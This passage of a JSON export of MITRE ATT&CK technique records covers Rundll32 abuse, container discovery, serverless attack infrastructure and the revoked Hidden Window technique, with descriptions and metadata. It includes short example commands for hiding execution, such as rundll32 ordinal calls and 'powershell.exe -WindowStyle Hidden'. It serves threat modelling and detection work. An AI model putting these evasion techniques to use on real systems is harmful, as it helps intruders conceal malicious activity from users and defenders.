(e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).\n\nAdditionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)","mitigation_ids":"M1050","mitigation_count":1,"detection_strategy_name":"Detection Strategy for T1218.011 Rundll32 Abuse","has_detection_strategy":true,"malware_use_count":67,"tool_use_count":2,"group_use_count":26,"campaign_use_count":8,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"3.0","created_date":"2020-01-23","modified_date":"2026-05-12","collection_version":"Enterprise ATT&CK 19.2","row_hash":"d93be85cbcd2"},{"technique_id":"T1613","technique_name":"Container and Resource Discovery","technique_url":"https://attack.mitre.org/techniques/T1613","is_subtechnique":false,"parent_technique_id":null,"tactics":"discovery","tactic_count":1,"platforms":"Containers","platform_count":1,"description":"Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\n\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.","mitigation_ids":"M1018|M1030|M1035","mitigation_count":3,"detection_strategy_name":"Detection Strategy for Container and Resource Discovery","has_detection_strategy":true,"malware_use_count":3,"tool_use_count":1,"group_use_count":1,"campaign_use_count":0,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"1.1","created_date":"2021-03-31","modified_date":"2025-10-24","collection_version":"Enterprise ATT&CK 19.2","row_hash":"17e5e32a9947"},{"technique_id":"T1583.007","technique_name":"Serverless","technique_url":"https://attack.mitre.org/techniques/T1583/007","is_subtechnique":true,"parent_technique_id":"T1583","tactics":"resource-development","tactic_count":1,"platforms":"PRE","platform_count":1,"description":"Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.\n\nOnce acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)","mitigation_ids":"M1056","mitigation_count":1,"detection_strategy_name":"Detection of Serverless","has_detection_strategy":true,"malware_use_count":0,"tool_use_count":0,"group_use_count":0,"campaign_use_count":1,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"1.1","created_date":"2022-07-08","modified_date":"2025-04-15","collection_version":"Enterprise ATT&CK 19.2","row_hash":"a1fad7ee2c73"},{"technique_id":"T1143","technique_name":"Hidden Window","technique_url":"https://attack.mitre.org/techniques/T1143","is_subtechnique":false,"parent_technique_id":null,"tactics":"stealth","tactic_count":1,"platforms":"Windows|macOS","platform_count":2,"description":"Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.\n\n### Windows\nThere are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>.  (Citation: PowerShell About 2019)\n\n### Mac\nThe configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)","mitigation_ids":"","mitigation_count":0,"detection_strategy_name":null,"has_detection_strategy":false,"malware_use_count":0,"tool_use_count":0,"group_use_count":0,"campaign_use_count":0,"is_revoked":true,"is_deprecated":false,"superseded_by_id":"T1564.003","attack_version":"1.2","created_date":"2017-12-14","modified_date":"2026-04-14","collection_version":"Enterprise ATT&CK 19.2","row_hash":"5ce37eb2466f"}]